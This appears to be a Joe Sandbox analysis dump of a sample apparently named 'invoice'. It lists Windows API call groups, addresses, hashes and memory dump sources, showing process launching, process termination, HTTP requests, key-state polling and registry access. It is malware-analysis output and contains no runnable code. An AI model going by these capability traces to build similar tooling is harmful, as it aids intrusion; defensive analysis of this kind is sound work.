                          • Part of subcall function 00FD83D1: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00FD83F2
                          • Part of subcall function 00FD83D1: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00FD8401
                          • Part of subcall function 00FD83D1: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00FD8408
                          • Part of subcall function 00FD83D1: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00FD841E
                        • GetLengthSid.ADVAPI32(?,00000000,00FD8757), ref: 00FD8B8C
                        • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00FD8B98
                        • HeapAlloc.KERNEL32(00000000), ref: 00FD8B9F
                        • CopySid.ADVAPI32(00000000,00000000,?), ref: 00FD8BB8
                        • GetProcessHeap.KERNEL32(00000000,00000000,00FD8757), ref: 00FD8BCC
                        • HeapFree.KERNEL32(00000000), ref: 00FD8BD3
                        Similarity
                        • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                        • String ID:
                        • API String ID: 3008561057-0
                        • Opcode ID: 86d634eba32655ac63e41cecf89dff0e8e5a84a95c25d7099610eda190d59fc8
                        • Instruction ID: d193d413c72511ebff355cebd552ad13065a1a777d8d3a9409d0705b1a461440
                        • Opcode Fuzzy Hash: 86d634eba32655ac63e41cecf89dff0e8e5a84a95c25d7099610eda190d59fc8
                        • Instruction Fuzzy Hash: DA11B1B1901205FFDB21DFA4CC09FAF77BAEB85365F18401AF88597240CB369901EB60
                        APIs
                        • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00FD890A
                        • OpenProcessToken.ADVAPI32(00000000), ref: 00FD8911
                        • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00FD8920
                        • CloseHandle.KERNEL32(00000004), ref: 00FD892B
                        • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00FD895A
                        • DestroyEnvironmentBlock.USERENV(00000000), ref: 00FD896E
                        Similarity
                        • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                        • String ID:
                        • API String ID: 1413079979-0
                        • Opcode ID: d97a005f6ad532a436b14217234d91acfc810a8e544dbc1c6da581471f7e1580
                        • Instruction ID: 425f2e49ad28b46128a7f53fbd1be70091e8ae215991b5e39e7b2e80f95a098a
                        • Opcode Fuzzy Hash: d97a005f6ad532a436b14217234d91acfc810a8e544dbc1c6da581471f7e1580
                        • Instruction Fuzzy Hash: 03118C7250020AABDF22CFA4DC09FEE7BA9FF08758F084115FE44A2150C7768D61BB62
                        APIs
                        • GetDC.USER32(00000000), ref: 00FDBA77
                        • GetDeviceCaps.GDI32(00000000,00000058), ref: 00FDBA88
                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00FDBA8F
                        • ReleaseDC.USER32(00000000,00000000), ref: 00FDBA97
                        • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00FDBAAE
                        • MulDiv.KERNEL32(000009EC,?,?), ref: 00FDBAC0
                        Similarity
                        • API ID: CapsDevice$Release
                        • String ID:
                        • API String ID: 1035833867-0
                        • Opcode ID: 75e9052521dac28db73bd8296ade266fbd22c99ccb9ac89725b4a0368b08221f
                        • Instruction ID: ea0d5fe3f7ceaf0b2fcccf6b230c5e7f09c5e08b1463cf83bad57124f8efff4b
                        • Opcode Fuzzy Hash: 75e9052521dac28db73bd8296ade266fbd22c99ccb9ac89725b4a0368b08221f
                        • Instruction Fuzzy Hash: 2301D471E00709BBEB209FB59C45A4EBFB8EB48721F004066FE04A7380DA358C00DF90
                        APIs
                        • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00FA0313
                        • MapVirtualKeyW.USER32(00000010,00000000), ref: 00FA031B
                        • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00FA0326
                        • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00FA0331
                        • MapVirtualKeyW.USER32(00000011,00000000), ref: 00FA0339
                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00FA0341
                        Similarity
                        • API ID: Virtual
                        • String ID:
                        • API String ID: 4278518827-0
                        • Opcode ID: c2e2a8e205a596f1f0629439e6e323dd62fee0066efa869ad00b16e27ad306b0
                        • Instruction ID: b6e77dd55adf3cbc40442f8eb72ecb0c1450f09a3a826d779fecce4f4c8c6ae8
                        • Opcode Fuzzy Hash: c2e2a8e205a596f1f0629439e6e323dd62fee0066efa869ad00b16e27ad306b0
                        • Instruction Fuzzy Hash: 9D016CB090175A7DE3008F6A8C85B52FFA8FF19354F00411BA15C47941C7F5A864CBE5
                        APIs
                        • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00FE54A0
                        • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00FE54B6
                        • GetWindowThreadProcessId.USER32(?,?), ref: 00FE54C5
                        • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00FE54D4
                        • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00FE54DE
                        • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00FE54E5
                        Similarity
                        • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                        • String ID:
                        • API String ID: 839392675-0
                        • Opcode ID: 7689ff38643b3cee7d7c1139e7cb1b0dd0c3d91196acb42aae48f7476c49c7cc
                        • Instruction ID: 6ec5ea9ae9b02437749d775feba7fa1967e95fa7094bb589e4dea11b597bf365
                        • Opcode Fuzzy Hash: 7689ff38643b3cee7d7c1139e7cb1b0dd0c3d91196acb42aae48f7476c49c7cc
                        • Instruction Fuzzy Hash: 9DF01231541559BBD7325B629C0DEEB7B7CEBCAB15F000159F944D10809AA61A0197B5
                        APIs
                        • InterlockedExchange.KERNEL32(?,?), ref: 00FE72EC
                        • EnterCriticalSection.KERNEL32(?,?,00F91044,?,?), ref: 00FE72FD
                        • TerminateThread.KERNEL32(00000000,000001F6,?,00F91044,?,?), ref: 00FE730A
                        • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00F91044,?,?), ref: 00FE7317
                          • Part of subcall function 00FE6CDE: CloseHandle.KERNEL32(00000000,?,00FE7324,?,00F91044,?,?), ref: 00FE6CE8
                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 00FE732A
                        • LeaveCriticalSection.KERNEL32(?,?,00F91044,?,?), ref: 00FE7331
                        Similarity
                        • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                        • String ID:
                        • API String ID: 3495660284-0
                        • Opcode ID: d75ea6610a8a189857e537b0aadfc709aef35f1f253b0cae9a79517841bf0a0d
                        • Instruction ID: 92125f3dbcb692d53998e87eee93784b33ed7b904b84d293fad1a3680b03074d
                        • Opcode Fuzzy Hash: d75ea6610a8a189857e537b0aadfc709aef35f1f253b0cae9a79517841bf0a0d
                        • Instruction Fuzzy Hash: D5F05E36544713ABE7323B64ED8C9DA772AEF49312F100521F582D1098CB7A5811EBA0
                        APIs
                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00FD8C5F
                        • UnloadUserProfile.USERENV(?,?), ref: 00FD8C6B
                        • CloseHandle.KERNEL32(?), ref: 00FD8C74
                        • CloseHandle.KERNEL32(?), ref: 00FD8C7C
                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00FD8C85
                        • HeapFree.KERNEL32(00000000), ref: 00FD8C8C
                        Similarity
                        • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                        • String ID:
                        • API String ID: 146765662-0
                        • Opcode ID: 27d89349b61a38275d016bb25bcb413a96e2e924f7186123d395bbede39bf002
                        • Instruction ID: d82eeb8144335d3076d5c397a13ba6d18da09fbbc643793b18bfac08ed8f583d
                        • Opcode Fuzzy Hash: 27d89349b61a38275d016bb25bcb413a96e2e924f7186123d395bbede39bf002
                        • Instruction Fuzzy Hash: 12E0ED36004502BBD7226FE1EC0C945BF79FF89722F108220F259C1068CB375460EB50
                        APIs
                        • VariantInit.OLEAUT32(?), ref: 00FF8728
                        • CharUpperBuffW.USER32(?,?), ref: 00FF8837
                        • VariantClear.OLEAUT32(?), ref: 00FF89AF
                          • Part of subcall function 00FE760B: VariantInit.OLEAUT32(00000000), ref: 00FE764B
                          • Part of subcall function 00FE760B: VariantCopy.OLEAUT32(00000000,?), ref: 00FE7654
                          • Part of subcall function 00FE760B: VariantClear.OLEAUT32(00000000), ref: 00FE7660
                        Strings
                        Similarity
                        • API ID: Variant$ClearInit$BuffCharCopyUpper
                        • String ID: AUTOIT.ERROR$Incorrect Parameter format
                        • API String ID: 4237274167-1221869570
                        • Opcode ID: 320ebb439afee5736be17a1102b9b0536511c5f6c67e60f80d910e3c27e13227
                        • Instruction ID: b535c7de913b2d6f0d4980368d22d28be86724ffc4cb1ef95f0e1fd7f8a25cbb
                        • Opcode Fuzzy Hash: 320ebb439afee5736be17a1102b9b0536511c5f6c67e60f80d910e3c27e13227
                        • Instruction Fuzzy Hash: 9391CD75608305DFC710EF24C88096ABBF4EF88754F14896EF98A8B361DB74E906DB52
                        APIs
                          • Part of subcall function 00F9FE06: _wcscpy.LIBCMT ref: 00F9FE29
                        • _memset.LIBCMT ref: 00FE2E7F
                        • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00FE2EAE
                        • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00FE2F61
                        • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00FE2F8F
                        Strings
                        Similarity
                        • API ID: ItemMenu$Info$Default_memset_wcscpy
                        • String ID: 0
                        • API String ID: 4152858687-4108050209
                        • Opcode ID: eff2cf818f33c5aacdde0de9b8935ea6515509cb3b2a7139529cd28bff86e7cc
                        • Instruction ID: e8e9f34ec69e0cd463eab9372f194470b18693136466de9c8cebcbd446f281b5
                        • Opcode Fuzzy Hash: eff2cf818f33c5aacdde0de9b8935ea6515509cb3b2a7139529cd28bff86e7cc
                        • Instruction Fuzzy Hash: C651C171A083819FD7A59F2ADC4566BB7FCEF85320F040A2DF895E6190EB64CD00A792
                        APIs
                        • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00FDD8E3
                        • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00FDD919
                        • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00FDD92A
                        • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00FDD9AC
                        Similarity
                        • API ID: ErrorMode$AddressCreateInstanceProc
                        • String ID: DllGetClassObject
                        APIs
                        • _memset.LIBCMT ref: 00FE2AB8
                        • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00FE2AD4
                        • DeleteMenu.USER32(?,00000007,00000000), ref: 00FE2B1A
                        • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,01045890,00000000), ref: 00FE2B63
                        Similarity
                        • API ID: Menu$Delete$InfoItem_memset
                        • String ID: 0
                        APIs
                        • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00FFD8D9
                          • Part of subcall function 00F879AB: _memmove.LIBCMT ref: 00F879F9
                        Similarity
                        • API ID: BuffCharLower_memmove
                        • String ID: cdecl$none$stdcall$winapi
                        APIs
                          • Part of subcall function 00F87F41: _memmove.LIBCMT ref: 00F87F82
                          • Part of subcall function 00FDAEA4: GetClassNameW.USER32(?,?,000000FF), ref: 00FDAEC7
                        • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00FD91D6
                        • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00FD91E9
                        • SendMessageW.USER32(?,00000189,?,00000000), ref: 00FD9219
                          • Part of subcall function 00F87D2C: _memmove.LIBCMT ref: 00F87D66
                        Similarity
                        • API ID: MessageSend$_memmove$ClassName
                        • String ID: ComboBox$ListBox
                        APIs
                        • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00FF1962
                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00FF1988
                        • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00FF19B8
                        • InternetCloseHandle.WININET(00000000), ref: 00FF19FF
                          • Part of subcall function 00FF2599: GetLastError.KERNEL32(?,?,00FF192D,00000000,00000000,00000001), ref: 00FF25AE
                          • Part of subcall function 00FF2599: SetEvent.KERNEL32(?,?,00FF192D,00000000,00000000,00000001), ref: 00FF25C3
                        Similarity
                        • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                        APIs
                          • Part of subcall function 00F81D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00F81D73
                          • Part of subcall function 00F81D35: GetStockObject.GDI32(00000011), ref: 00F81D87
                          • Part of subcall function 00F81D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00F81D91
                        • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 01006493
                        • LoadLibraryW.KERNEL32(?), ref: 0100649A
                        • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 010064AF
                        • DestroyWindow.USER32(?), ref: 010064B7
                        Similarity
                        • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                        • String ID: SysAnimate32
                        APIs
                        • GetStdHandle.KERNEL32(0000000C), ref: 00FE6E65
                        • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00FE6E98
                        • GetStdHandle.KERNEL32(0000000C), ref: 00FE6EAA
                        • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00FE6EE4
                        Similarity
                        • API ID: CreateHandle$FilePipe
                        • String ID: nul
                        APIs
                        • GetStdHandle.KERNEL32(000000F6), ref: 00FE6F32
                        • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00FE6F64
                        • GetStdHandle.KERNEL32(000000F6), ref: 00FE6F75
                        • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00FE6FAF
                        Similarity
                        • API ID: CreateHandle$FilePipe
                        • String ID: nul
                        APIs
                        • SetErrorMode.KERNEL32(00000001), ref: 00FEACDE
                        • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00FEAD32
                        • __swprintf.LIBCMT ref: 00FEAD4B
                        • SetErrorMode.KERNEL32(00000000,00000001,00000000,0100F910), ref: 00FEAD89
                        Similarity
                        • API ID: ErrorMode$InformationVolume__swprintf
                        • String ID: %lu
                        APIs
                          • Part of subcall function 00F87D2C: _memmove.LIBCMT ref: 00F87D66
                          • Part of subcall function 00FDA15C: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00FDA179
                          • Part of subcall function 00FDA15C: GetWindowThreadProcessId.USER32(?,00000000), ref: 00FDA18C
                          • Part of subcall function 00FDA15C: GetCurrentThreadId.KERNEL32 ref: 00FDA193
                          • Part of subcall function 00FDA15C: AttachThreadInput.USER32(00000000), ref: 00FDA19A
                        • GetFocus.USER32 ref: 00FDA334
                          • Part of subcall function 00FDA1A5: GetParent.USER32(?), ref: 00FDA1B3
                        • GetClassNameW.USER32(?,?,00000100), ref: 00FDA37D
                        • EnumChildWindows.USER32(?,00FDA3F5), ref: 00FDA3A5
                        • __swprintf.LIBCMT ref: 00FDA3BF
                        Similarity
                        • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                        • String ID: %s%d
                        APIs
                        • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00FFED1B
                        • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00FFED4B
                        • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00FFEE7E
                        • CloseHandle.KERNEL32(?), ref: 00FFEEFF
                        Similarity
                        • API ID: Process$CloseCountersHandleInfoMemoryOpen
                        APIs
                        Similarity
                        • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                        APIs
                          • Part of subcall function 00F87F41: _memmove.LIBCMT ref: 00F87F82
                          • Part of subcall function 01000EA5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00FFFE38,?,?), ref: 01000EBC
                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 01000188
                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 010001C7
                        • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 0100020E
                        • RegCloseKey.ADVAPI32(?,?), ref: 0100023A
                        • RegCloseKey.ADVAPI32(00000000), ref: 01000247
                        Similarity
                        • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                        APIs
                          • Part of subcall function 00F89997: __itow.LIBCMT ref: 00F899C2
                          • Part of subcall function 00F89997: __swprintf.LIBCMT ref: 00F89A0C
                        • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00FFDA3B
                        • GetProcAddress.KERNEL32(00000000,?), ref: 00FFDABE
                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 00FFDADA
                        • GetProcAddress.KERNEL32(00000000,?), ref: 00FFDB1B
                        • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00FFDB35
                          • Part of subcall function 00F85B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00FE793F,?,?,00000000), ref: 00F85B8C
                          • Part of subcall function 00F85B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00FE793F,?,?,00000000,?,?), ref: 00F85BB0
                        Similarity
                        • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                        APIs
                        • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00FEE6AB
                        • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00FEE6D4
                        • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00FEE713
                          • Part of subcall function 00F89997: __itow.LIBCMT ref: 00F899C2
                          • Part of subcall function 00F89997: __swprintf.LIBCMT ref: 00F89A0C
                        • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00FEE738
                        • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00FEE740
                        Similarity
                        • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                        • String ID:
                        • API String ID: 1389676194-0
                        • Opcode ID: 05229eca49fea6ba84e3366506c036b477c95731d045a8f46a9b40e1a18cebe9
                        • Instruction ID: 4e9e68d51e56c9c0347aa500bc10a8cf5ee85dbece32689620e2292350c3d843
                        • Opcode Fuzzy Hash: 05229eca49fea6ba84e3366506c036b477c95731d045a8f46a9b40e1a18cebe9
                        • Instruction Fuzzy Hash: 93515A35A04205DFCF11EF64C985AAEBBF5EF09310F188099E849AB362CB75ED11EB50
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2666e0166119e7c26ddf76af26edf69e15d153d96557a3ca8705db86565fe84a
                        • Instruction ID: a312c2aa34617959a84ef5091e230f6c5e8e6d2d40d5379f317e08c957be30f9
                        • Opcode Fuzzy Hash: 2666e0166119e7c26ddf76af26edf69e15d153d96557a3ca8705db86565fe84a
                        • Instruction Fuzzy Hash: DE41B535A00304EBFB62DF28CC44FE9BBA5EB093A0F0501A5F995A72D1C7359A41D750
                        APIs
                        • GetCursorPos.USER32(?), ref: 00F82357
                        • ScreenToClient.USER32(010457B0,?), ref: 00F82374
                        • GetAsyncKeyState.USER32(00000001), ref: 00F82399
                        • GetAsyncKeyState.USER32(00000002), ref: 00F823A7
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: AsyncState$ClientCursorScreen
                        • String ID:
                        • API String ID: 4210589936-0
                        • Opcode ID: 3d1ad1c223882b6f2b8bd8518d33bd27b46f5369da95b85ee7da00737e878fb5
                        • Instruction ID: 9c84869200deee72041c7386003c587de2ef8aa136fb265bc522dc8adba7b116
                        • Opcode Fuzzy Hash: 3d1ad1c223882b6f2b8bd8518d33bd27b46f5369da95b85ee7da00737e878fb5
                        • Instruction Fuzzy Hash: FD41A275908106FBDF259F69C854AEEBB74FB05330F20432AF868A2291C7356950EFA0
                        APIs
                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00FD673D
                        • TranslateAcceleratorW.USER32(?,?,?), ref: 00FD6789
                        • TranslateMessage.USER32(?), ref: 00FD67B2
                        • DispatchMessageW.USER32(?), ref: 00FD67BC
                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00FD67CB
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Message$PeekTranslate$AcceleratorDispatch
                        • String ID:
                        • API String ID: 2108273632-0
                        • Opcode ID: 4863ebc549deea9ccb369cbffeaaaec311b06b9b2d970e94ad593742768ee081
                        • Instruction ID: aac47dabdf741da6c937b28312643354bf09990b2f8a1e8b78fd41c6ebbf5dd2
                        • Opcode Fuzzy Hash: 4863ebc549deea9ccb369cbffeaaaec311b06b9b2d970e94ad593742768ee081
                        • Instruction Fuzzy Hash: EC31C471D0020B9FDB30DE709C84FB67BE9AF05318F180167E461C7295EB2AA449F750
                        APIs
                        • GetWindowRect.USER32(?,?), ref: 00FD8CF2
                        • PostMessageW.USER32(?,00000201,00000001), ref: 00FD8D9C
                        • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00FD8DA4
                        • PostMessageW.USER32(?,00000202,00000000), ref: 00FD8DB2
                        • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00FD8DBA
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: MessagePostSleep$RectWindow
                        • String ID:
                        • API String ID: 3382505437-0
                        • Opcode ID: a9390e74661093189f8f8a7f982c9f3dfb0b50399198e9c93290c0295b2caf93
                        • Instruction ID: 4020331407656cb2fe93e9000af53cfa60437c6037d1fef52a9870b781d832f6
                        • Opcode Fuzzy Hash: a9390e74661093189f8f8a7f982c9f3dfb0b50399198e9c93290c0295b2caf93
                        • Instruction Fuzzy Hash: 4131E071900219EBDF20CF68DD4CA9E3BB6EB14325F14421AF925E62D0C7B49911EB90
                        APIs
                        • IsWindowVisible.USER32(?), ref: 00FDB4C6
                        • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00FDB4E3
                        • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00FDB51B
                        • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00FDB541
                        • _wcsstr.LIBCMT ref: 00FDB54B
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                        • String ID:
                        • API String ID: 3902887630-0
                        • Opcode ID: 49a9b26f85d8e94bee4ff48eaa1eda7cf08a00fa099be8aa901d92e3fcfa1368
                        • Instruction ID: f6b7f24731312d1a526b116205c906c2ae07bdfe4f039f35ab3942acdefe6c71
                        • Opcode Fuzzy Hash: 49a9b26f85d8e94bee4ff48eaa1eda7cf08a00fa099be8aa901d92e3fcfa1368
                        • Instruction Fuzzy Hash: 6821F872604201BBEB259F39AC05F7B7BA9DB49760F09402AF805DA255EF65CC00B3A0
                        APIs
                          • Part of subcall function 00F82612: GetWindowLongW.USER32(?,000000EB), ref: 00F82623
                        • GetWindowLongW.USER32(?,000000F0), ref: 0100B1C6
                        • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0100B1EB
                        • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0100B203
                        • GetSystemMetrics.USER32(00000004), ref: 0100B22C
                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00FF0FA5,00000000), ref: 0100B24A
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Window$Long$MetricsSystem
                        • String ID:
                        • API String ID: 2294984445-0
                        • Opcode ID: 2fcce85c40dac9a38f11f785f053428e4feaa81e3a0b4db9d9ff82f2f3320599
                        • Instruction ID: bc3736e4b5b04d160e3602e599abb3f20fca8333f292927e36c4c3bb4e0dbc59
                        • Opcode Fuzzy Hash: 2fcce85c40dac9a38f11f785f053428e4feaa81e3a0b4db9d9ff82f2f3320599
                        • Instruction Fuzzy Hash: 8D219F75910616AFEB629F388C48B6E3BA4FB05721F114728FAA2D21D0E7359851DB90
                        APIs
                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00FD95E2
                          • Part of subcall function 00F87D2C: _memmove.LIBCMT ref: 00F87D66
                        • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00FD9614
                        • __itow.LIBCMT ref: 00FD962C
                        • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00FD9654
                        • __itow.LIBCMT ref: 00FD9665
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
